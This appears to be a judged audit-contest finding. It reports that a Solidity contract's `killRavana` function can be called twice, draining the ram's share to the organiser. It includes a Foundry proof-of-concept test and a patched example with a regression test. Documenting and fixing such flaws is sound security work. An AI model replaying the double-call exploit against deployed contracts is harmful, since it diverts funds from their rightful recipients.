Submission Details
Severity: medium
Valid

`Dussehra::killRavana` function is called twice

Summary

If the `Dussehra::killRavana` function is called twice, all the funds in the contract are sent to the organiser.

Vulnerability Details

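When called, the `Dussehra::killRavana` function sets `IsRavanKilled` to true and sends half the funds in the contract to the organiser; the remaining half is given to the selected ram. Nothing stops the function from being called a second time, so a second call sends the remaining half to the organiser as well.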

Code
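```solidity
function test_killRavanaTwice() public Moreparticipants {
    // Advance block time, then let the organiser select the ram
    vm.warp(1728691200 + 1);
    vm.startPrank(organiser);
    choosingRam.selectRamIfNotSelected();
    vm.stopPrank();

    // First call: half of the funds go to the organiser, 1.5 ether is left
    vm.startPrank(player2);
    dussehra.killRavana();
    vm.stopPrank();
    assertEq(dussehra.IsRavanKilled(), true);
    assertEq(address(dussehra).balance, 1.5 ether);

    // Second call by the same player is not rejected
    vm.startPrank(player2);
    dussehra.killRavana();
    vm.stopPrank();

    // The remaining balance has been sent out as well
    assertEq(address(dussehra).balance, 0);
}
```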

Impact

If the `Dussehra::killRavana` function is called twice, all the ether will be sent to the organiser and the selected ram will not get any ether.

Tools Used

Manual analysis

Recommendations

Add a check to the Dussehra::killRavana function so it will revert if IsRavanKilled is true.
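One way to implement the recommended check, as an added example that is not the audited contract or the submitter's code: a simplified payout contract plus a Foundry regression test for the double call. Only `killRavana`, `IsRavanKilled` and `organiser` come from the report; `GuardedPayout`, `ramShare`, the `AlreadyKilled` error and the 3 ether funding are assumptions made for the illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Simplified model written for this example, NOT the audited Dussehra contract.
// killRavana, IsRavanKilled and organiser are names from the report; the rest
// (GuardedPayout, ramShare, AlreadyKilled) is hypothetical.
contract GuardedPayout {
    address public immutable organiser;
    bool public IsRavanKilled;
    uint256 public ramShare; // half reserved for the selected ram

    error AlreadyKilled();

    constructor(address _organiser) payable {
        organiser = _organiser;
    }

    function killRavana() external {
        // The missing check: a repeat call reverts instead of paying out again.
        if (IsRavanKilled) revert AlreadyKilled();

        // Update state before the external call (checks-effects-interactions).
        IsRavanKilled = true;
        uint256 organiserShare = address(this).balance / 2;
        ramShare = address(this).balance - organiserShare;

        (bool ok, ) = organiser.call{value: organiserShare}("");
        require(ok, "transfer to organiser failed");
    }
}

contract GuardedPayoutTest is Test {
    function test_secondKillRavanaReverts() public {
        address organiser = makeAddr("organiser");
        vm.deal(address(this), 3 ether); // constructed funding for the example
        GuardedPayout payout = new GuardedPayout{value: 3 ether}(organiser);

        payout.killRavana();
        assertEq(address(payout).balance, 1.5 ether);

        vm.expectRevert(GuardedPayout.AlreadyKilled.selector);
        payout.killRavana();
        // The ram's half is still in the contract after the rejected call.
        assertEq(address(payout).balance, 1.5 ether);
        assertEq(organiser.balance, 1.5 ether);
    }
}
```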

Updates

Lead Judging Commences

bube Lead Judge about 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

isRavanKilled is not checked
